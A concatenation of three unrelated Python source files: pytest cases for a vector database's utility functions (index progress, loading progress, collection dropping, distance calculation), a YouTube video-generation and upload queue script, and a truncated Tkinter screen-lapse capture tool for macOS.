method: insert 5000 entities, build and call wait_index
expected: 5000 entity indexed
"""
nb = 5000
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.wait_for_index_building_complete(c_name)
assert res is True
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res["indexed_rows"] == nb
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_without_loading(self):
"""
target: test loading progress without loading
method: insert and flush data, call loading_progress without loading
expected: loaded entities is 0
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.parametrize("nb", [ct.default_nb, 5000])
def test_loading_progress_collection(self, nb):
"""
target: test loading progress
method: 1.insert flush and load 2.call loading_progress
expected: all entities is loafed, because load is synchronous
"""
# create, insert default_nb, flush and load
collection_w = self.init_collection_general(prefix, insert_data=True, nb=nb)[0]
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_total_entities] == nb
assert res[num_loaded_entities] == nb
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #702")
def test_loading_progress_with_async_load(self):
"""
target: test loading progress with async collection load
method: 1.load collection with async=True 2.loading_progress
expected: loading part entities
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load(_async=True)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert (0 < res[num_loaded_entities] <= ct.default_nb)
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_empty_collection(self):
"""
target: test loading_progress on a empty collection
method: 1.create collection and no insert 2.loading_progress
expected: 0 entities is loaded
"""
collection_w = self.init_collection_wrap()
collection_w.load()
res, _ = self.utility_wrap.loading_progress(collection_w.name)
exp_res = {num_loaded_entities: 0, num_total_entities: 0}
assert exp_res == res
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_after_release(self):
"""
target: test loading progress without loading
method: insert and flush data, call loading_progress without loading
expected: loaded entities is 0
"""
collection_w = self.init_collection_general(prefix, insert_data=True)[0]
collection_w.release()
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
@pytest.mark.tag(CaseLabel.L2)
def test_loading_progress_with_release_partition(self):
"""
target: test loading progress after release part partitions
method: 1.insert data into two partitions and flush
2.load collection and release onr partition
expected: loaded one partition entities
"""
half = ct.default_nb
# insert entities into two partitions, collection flush and load
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
partition_w.release()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
@pytest.mark.tag(CaseLabel.L2)
def test_loading_progress_with_load_partition(self):
"""
target: test loading progress after load partition
method: 1.insert data into two partitions and flush
2.load one partition and loading progress
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
collection_w.release()
partition_w.load()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_with_partition(self):
"""
target: test loading progress with partition
method: 1.insert data into two partitions and flush, and load
2.loading progress with one partition
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
res = self.utility_wrap.loading_progress(collection_w.name, partition_names=[partition_w.name])[0]
assert res[num_total_entities] == half
assert res[num_loaded_entities] == half
@pytest.mark.tags(CaseLabel.L1)
def test_wait_loading_collection_empty(self):
"""
target: test wait_for_loading
method: input empty collection
expected: no exception raised
"""
self._connect()
cw = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
cw.load()
self.utility_wrap.wait_for_loading_complete(cw.name)
res, _ = self.utility_wrap.loading_progress(cw.name)
exp_res = {num_total_entities: 0, num_loaded_entities: 0}
assert res == exp_res
@pytest.mark.xfail(reason="pymilvus issue #702")
@pytest.mark.tag(CaseLabel.L1)
def test_wait_for_loading_complete(self):
"""
target: test wait for loading collection
method: insert 10000 entities and wait for loading complete
expected: after loading complete, loaded entities is 10000
"""
nb = 6000
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
assert collection_w.num_entities == nb
collection_w.load(_async=True)
self.utility_wrap.wait_for_loading_complete(collection_w.name)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_loaded_entities] == nb
@pytest.mark.tag(CaseLabel.L0)
def test_drop_collection(self):
"""
target: test utility drop collection by name
method: input collection name and drop collection
expected: collection is dropped
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
def test_drop_collection_repeatedly(self):
"""
target: test drop collection repeatedly
method: 1.collection.drop 2.utility.drop_collection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
collection_w.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: {"describe collection failed: can't find collection:"}}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
def test_drop_collection_create_repeatedly(self):
"""
target: test repeatedly create and drop same name collection
method: repeatedly create and drop collection
expected: no exception
"""
from time import sleep
loops = 3
c_name = cf.gen_unique_str(prefix)
for _ in range(loops):
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
sleep(1)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_default(self):
"""
target: test calculated distance with default params
method: calculated distance between two random vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors")
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_sqrt(self, metric_field, metric):
"""
target: test calculated distance with default param
method: calculated distance with default sqrt
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default sqrt")
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_metric(self, sqrt):
"""
target: test calculated distance with default param
method: calculated distance with default metric
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default metric")
params = {"sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_binary_metric(self, metric_field, metric_binary):
"""
target: test calculate distance with binary vectors
method: calculate distance between binary vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
nb = 10
raw_vectors_l, vectors_l = cf.gen_binary_vectors(nb, default_dim)
raw_vectors_r, vectors_r = cf.gen_binary_vectors(nb, default_dim)
op_l = {"bin_vectors": vectors_l}
op_r = {"bin_vectors": vectors_r}
log.info("Calculating distance for binary vectors")
params = {metric_field: metric_binary}
vectors_l = raw_vectors_l
vectors_r = raw_vectors_r
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric_binary})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_from_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: both left and right vectors are from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
log.info("Creating vectors from collections for distance calculation")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
log.info("Creating vectors for entities")
params = {metric_field: metric, "sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_collections(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from collections
method: calculated distance between entities from two collections
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
prefix_1 = "utility_distance"
log.info("Creating two collections")
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
collection_w_1, vectors_1, _, insert_ids_1, _ = self.init_collection_general(prefix_1, True, nb)
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors_1[0].loc[:, default_field_name]
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids, "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids_1, "collection": collection_w_1.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance for entities from two collections")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set left vectors as random vectors, right vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = cf.gen_vectors(nb, default_dim)
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
op_l = {"float_vectors": vectors_l}
log.info("Extracting entities from collections for distance calculating")
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between vectors and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set right vectors as random vectors, left vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = cf.gen_vectors(nb, default_dim)
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between right vector and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from one partition entities
method: both left and right vectors are from partition
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
log.info("Extracting entities from partitions for distance calculating")
vectors_l = vectors[i].loc[:, default_field_name]
vectors_r = vectors[i].loc[:, default_field_name]
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculating distance between entities from one partition")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partitions(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from partitions
method: calculate distance between entities from two partitions
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors[1].loc[:, default_field_name]
log.info("Extract entities from two partitions for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"partition": partitions[0].name, "field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"partition": partitions[1].name, "field": default_field_name}
log.info("Calculate distance between entities from two partitions")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set left vectors as random vectors, right vectors are entities
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_l = cf.gen_vectors(nb // 2, default_dim)
log.info("Extract entities from collection as right vectors")
op_l = {"float_vectors": vectors_l}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
log.info("Calculate distance between vector and entities")
for i in range(len(partitions)):
vectors_r = vectors[i].loc[:, default_field_name]
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set right vectors as random vectors, left vectors are entities
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_r = cf.gen_vectors(nb // 2, default_dim)
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
vectors_l = vectors[i].loc[:, default_field_name]
log.info("Extract entities from partition %d as left vector" % i)
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculate distance between vector and entities from partition %d" % i)
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
class TestUtilityAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multi_collections(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
for name in [c_name, c_name_2]:
res, _ = self.utility_wrap.has_collection(name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multi_collection(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
res, _ = self.utility_wrap.list_collections()
for name in [c_name, c_name_2]:
assert name in res
def test_drop_multi_collection_concurrent(self):
"""
target: test concurrent drop collection
method: multi thread drop one collection
expected: drop successfully
"""
thread_num = 3
threads = []
c_names = []
num = 5
for i in range(thread_num*num):
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
c_names.append(c_name)
def create_and_drop_collection(names):
for name in names:
assert self.utility_wrap.has_collection(name)[0]
self.utility_wrap.drop_collection(name)
assert not self.utility_wrap.has_collection(name)[0]
for i in range(thread_num):
x = threading.Thread(target=create_and_drop_collection, args=(c_names[i*num:(i+1)*num],))
threads.append(x)
x.start()
for t in threads:
t.join()
log.debug(self.utility_wrap.list_collections()[0])
|
youtubequeue.py
|
import os
import settings
settings.generateConfigFile()
import soundfile as sf
from pydub import AudioSegment
import generatorclient
from time import sleep
from subprocess import *
import videouploader
from threading import Thread
import pickle
import datetime
from datetime import timedelta
from PIL import Image
import subprocess
import videoscript
import random
from moviepy.editor import *
# 18:00 19:00 20:00 23:00 00:00 01:00
waitTill = None
scriptIBuffer = []
def loadVideoScripts():
vidsaves = os.listdir(settings.rawvideosaves)
print(vidsaves)
for vid in vidsaves:
if "DS_Store" in vid:
continue
path = settings.rawvideosaves + "/" + vid
with open(path, 'rb') as pickle_file:
script = pickle.load(pickle_file)
videoscript.videoscripts.append(script)
def parseScripts():
for musicType in generatorclient.musicTypes:
if not os.path.exists(settings.assetPath + "/Music/%s" % musicType):
print("Creating Music Path for %s: %s" % (musicType, settings.assetPath + "/Music/%s" % musicType))
os.makedirs(settings.assetPath + "/Music/%s" % musicType)
if len(os.listdir(settings.assetPath + "/Music/%s/" % musicType)) == 0:
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (settings.assetPath + "/Music/%s/" % musicType))
while True:
sleep(10)
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (
settings.assetPath + "/Music/%s/" % musicType))
pass
if scriptIBuffer:
for script in scriptIBuffer:
scriptno = script[0]
print("Parsing Raw Script %s" % scriptno)
scripttitle = script[1]
author = script[2]
ups = script[3]
payload = script[4]
final_script = payload[0]
videotype = payload[1]
video_settings = payload[2]
music_type = payload[3]
thumbnail = payload[4]
characters_amount = payload[5]
youtube_title = payload[6]
youtube_description = payload[7]
youtube_tags = payload[8]
videoscript.VideoScriptEngine(scriptno, scripttitle, author, ups, final_script, videotype, video_settings,
music_type, thumbnail, characters_amount, youtube_title, youtube_description,
youtube_tags)
scriptIBuffer.clear()
else:
print("VIDEO GENERATOR no scripts to parse")
def uploadVids():
pass
"""
if renderedVids:
for vid in renderedVids:
vid.generateMovie()
renderedVids.clear()
loadVideoScripts()
"""
def canUpload():
if generatorclient.last_upload_times is not None:
if generatorclient.last_upload_times == 0:
return settings.uploads_a_day
now = datetime.datetime.now()
vids_within_day = 0
for time in generatorclient.last_upload_times:
time = time[0]
if now.hour >= settings.youtube_api_quota_reset_hour:
if time > now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0):
vids_within_day += 1
else:
if time >= now - timedelta(days=1):
vids_within_day += 1
print("%s Videos uploaded since %s:00" % (vids_within_day, settings.youtube_api_quota_reset_hour))
print("Estimated quote usage %s" % (vids_within_day * 1658))
return settings.uploads_a_day - vids_within_day
return False
def tickThread():
global waitTill
while True:
sleep(5)
if generatorclient.last_upload_times is None and not generatorclient.isRequestingScripts:
print("No update times available... requesting more")
generatorclient.getLastUploadedScripts()
sleep(5)
if videoscript.videoscripts:
print("Rendering all video scripts...")
for script in videoscript.videoscripts:
script.renderVideo()
if waitTill is not None:
if datetime.datetime.now() > waitTill:
waitTill = None
else:
print("Out of Quote Response... waiting till %s" % waitTill)
if settings.exportOffline:
waitTill = None
if not settings.exportOffline:
if waitTill is None:
amount_to_upload = canUpload()
if type(amount_to_upload) is int:
scripts_available_to_upload = [script for i, script in enumerate(videoscript.videoscripts) if
script.isRendered]
print("Allowed to upload %s videos" % amount_to_upload)
if amount_to_upload > len(scripts_available_to_upload):
amount_to_upload = len(scripts_available_to_upload)
print("Only %s scripts available to upload" % amount_to_upload)
print("Uploading %s video scripts... %s ready to upload (total %s)" % (
amount_to_upload, amount_to_upload, len(videoscript.videoscripts)))
for i in range(0, amount_to_upload, 1):
upload = scripts_available_to_upload[i].uploadVideo()
try:
if upload is False:
now = datetime.datetime.now()
if now.hour > settings.youtube_api_quota_reset_hour:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0) + timedelta(days=1)
else:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0)
except Exception as e:
print(e)
pass
generatorclient.last_upload_times = None
# elif type(amount_to_upload) is bool:
# print("Can't get last update times")
else:
print("Estimated out of quotes waiting till %s" % waitTill)
else:
print("No video scripts, just chilling...")
if not generatorclient.isRequestingScripts:
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
def initQueue():
## process = subprocess.call("wine /home/royalreddit/Desktop/balcon/balcon.exe -t supnerds -w /home/royalreddit/Desktop/test2.wav", shell = True)
if not os.path.exists(settings.videoqueue_directory):
os.mkdir(settings.videoqueue_directory)
if not os.path.exists(settings.rawvideosaves):
os.mkdir(settings.rawvideosaves)
if not os.path.exists(settings.finishedvideosdirectory):
os.mkdir(settings.finishedvideosdirectory)
if not os.path.exists(settings.overlayPath):
os.mkdir(settings.overlayPath)
if not os.path.exists(f"{settings.currentPath}/TempVids"):
os.mkdir(f"{settings.currentPath}/TempVids")
loadVideoScripts()
generatorclient.connectToServer()
sleep(2)
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
thread = Thread(target=tickThread)
thread.start()
# uploadVids()
if __name__ == "__main__":
begin = True
if not settings.exportOffline:
videouploader.get_credentials()
else:
print("Video Generator launching in export offline mode")
if not settings.noSpeech:
if settings.use_balcon and settings.use_google_tts:
print("You have selected to use both google tts and balcon tts! Please only select one in the config file!")
begin = False
if not settings.use_balcon and not settings.use_google_tts:
print("You have not selected any tts options in the config file!"
" Please set either google tts or balcon tts to true! Not both!")
begin = False
if settings.use_balcon:
command = "%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Success", settings.balcon_voice)
process = subprocess.call(command, shell=True)
if process != 0:
print("Balcon not found. This will work when the following command works in your commandline: %s" % ("%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Test", settings.balcon_voice)))
begin = False
if settings.use_overlay:
if not os.path.exists(f"{settings.overlayPath}/{settings.overlay_image}"):
print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} does not exist! Fix the file name in config.ini or set use_overlay=False")
begin = False
else:
im = Image.open(f"{settings.overlayPath}/{settings.overlay_image}")
width, height = im.size
if width != 1920 or height != 1080:
print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} not of correct dimensions ({width},{height})! Needs to be 1920x1080")
begin = False
if begin:
initQueue()
|
capture_screenlapse.py
|
# #!/usr/bin/env python
"""
Description:
A simple screen capture utility, built with ease of use in mind, possibly buggy.
- Adjust capture speed on the fly (1x,5x,10x)
- Choose which screen to capture (main,external)
- Visual counter of captured images
Instruction:
First make sure you have changed the Record_Path below to a location you wish to save images.
To run on Mac:
open Terminal, type 'python' leave a space and then drop this file onto the terminal window and press enter.
To run on Windows:
open Terminal, type 'python' leave a space and then drop this file onto the terminal window and press enter. - untested
Source: https://twitter.com/KubeDev
Owner: https://twitter.com/KubeDev
"""
import Tkinter as tk
import threading
import time
import sys
import os
import subprocess
from AppKit import NSWorkspace
from time import gmtime, strftime
Record_Path = [ '/Users/kevinflynn/Tools/ScreenCapture/Output/Screen/' ]
Record_Apps = [ 'MonoDevelop-Unity' , 'Unity' , 'Sublime Text' , 'Notepad' ] ## Which Apps are allowed to trigger recording (note you must also select correct screen to record from!)
Record_Speed = 2 ## 1.0 = 1 second ..
Speed_Adjust = 0.0 ## Adjusted value do not edit.
Background_Execute = False
Screen_Type = [ "Main" , "External" ]
Screen_Type_Selected = Screen_Type[0]
Threads = None
image_Count = 0
AppFocus = False
def Thread_Work( id , bgExecute , label ):
def Thread_Exit():
print(" Exiting loop.")
global Background_Execute
global Speed_Adjust
while True:
if bgExecute() == False:
Thread_Exit()
break
Image_Shot()
label()
time.sleep( Speed_Adjust )
print("Thread {}, signing off".format(id))
def Thread_Start( label ):
print "Starting"
global image_Count
global Background_Execute
global Threads
Background_Execute = True
tmp = threading.Thread(target = Thread_Work, args=( id , lambda: Background_Execute , label ))
Threads = tmp
tmp.start()
def Thread_Stop():
global Background_Execute
global Threads
Background_Execute = False
time.sleep(0.1)
if Threads is not None:
Threads.join
print('Stopped.')
def Image_CurrentApp():
appInUse = ''
if sys.platform in ['Mac', 'darwin', 'os2', 'os2emx']:
active_window_name = (NSWorkspace.sharedWorkspace().activeApplication()['NSApplicationName'])
appInUse = active_window_name
return appInUse
def getImageCount( inVar ):
def addZero( t ):
return '0' + t
maxLength = 2
temp = str(inVar)
diff = maxLength - len(temp)
if( diff < 0):
temp = temp[abs(diff):]
if( diff > 0):
for x in range(0, diff):
temp = addZero(temp)
return temp
Time_Total = 0;
Time_ReadOut = '00:00:00';
def timeAdd():
global Speed_Adjust
global Time_Total
global Time_ReadOut
Time_Total += Speed_Adjust
def timeStr( t, minLength ):
temp = str(t)
if( len(temp) < minLength ):
return '0' + temp
else:
return temp
temp = round( Time_Total, 2)
time_secs = timeStr( int( temp % 60 ), 2)
time_mins = timeStr( int( (temp/60) % 60 ), 2)
time_hrs = timeStr( int( ((temp/60)/60) % 60 ), 2)
Time_ReadOut = time_hrs + ':' + time_mins + ':' + time_secs
def Image_Shot():
global AppFocus
if Image_CurrentApp() in Record_Apps or AppFocus == 0:
global Screen_Type
global Screen_Type_Selected
global image_Count
image_Count += 1
timeAdd()
bash_PathChar = '"'
bash_FileName = 'Screen'
bash_FileNameExt = '.jpg'
bashCommand_Full = ""
bash_BaseOptions = 'screencapture -C -t jpg -x ' ## -t = type, -x = make no sound .. https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/screencapture.1.html
bash_ImageCount = '-' + getImageCount(image_Count)
bash_FileDate = strftime("%j-%H-%M-%S", gmtime())
bash_FilePath = bash_PathChar + Record_Path[0] + bash_FileDate + bash_ImageCount + bash_FileNameExt + bash_PathChar
if Screen_Type_Selected == Screen_Type[0]:
bashCommand_Full = bash_BaseOptions + bash_FilePath + ";"
else:
bashCommand_Full = bash_BaseOptions + bash_FilePath + " " + bash_FilePath + ";"
output = subprocess.call( [ 'bash' , '-c' , bashCommand_Full ] )
class Capture_Gui( tk.Frame ):
inProgress = False
currentSpeed = 1.0
def __init__(self, master=None):
tk.Frame.__init__(self, master)
self.grid()
self.Create_Gui()
self.Adjust_Speed()
# self.Toggle_OnFocus()
def Create_Gui(self):
global Screen_Types
var = tk.StringVar()
self.checkVar = tk.IntVar()
self.captureButton = tk.Button( self, text='Capture', command = self.Button_StartPause, width = 5 )
self.ScreenOpts = tk.OptionMenu(self, var, *Screen_Type , command = self.Screen_Option )
self.ScreenOpts.config(width= 8)
var.set( Screen_Type[0] )
self.speedButton = tk.Button( self, text='1X', command = self.Button_Speed , width = 2 )
# self.AppFocusToggle = tk.Checkbutton( self, text='AppFocus', variable=self.checkVar, command = self.Toggle_OnFocus , width = 9 )
self.countValue = tk.Label( self, text="00" , width = 5 )
self.countTime = tk.Label( self, text="00:00:00" , width = 7 )
self.close_button = tk.Button(self, text="Close", command = self.Button_Close , width = 3 )
self.captureButton.grid(row=0, column=0 , sticky="ew" )
self.ScreenOpts.grid(row=0, column=1 , sticky="ew" )
self.speedButton.grid(row=0, column=2 , sticky="ew" )
# self.AppFocusToggle.grid(row=0, column=3 , sticky="ew" )
self.countTime.grid(row=0 , column =3 , sticky="ew" )
self.countValue.grid(row=0 , column =4 , sticky="ew" )
self.close_button.grid(row=0, column=5, sticky="ew" )
def Screen_Option( self , selectedList ):
global Screen_Type_Selected
Screen_Type_Selected = selectedList
def Label_Count_Time(self):
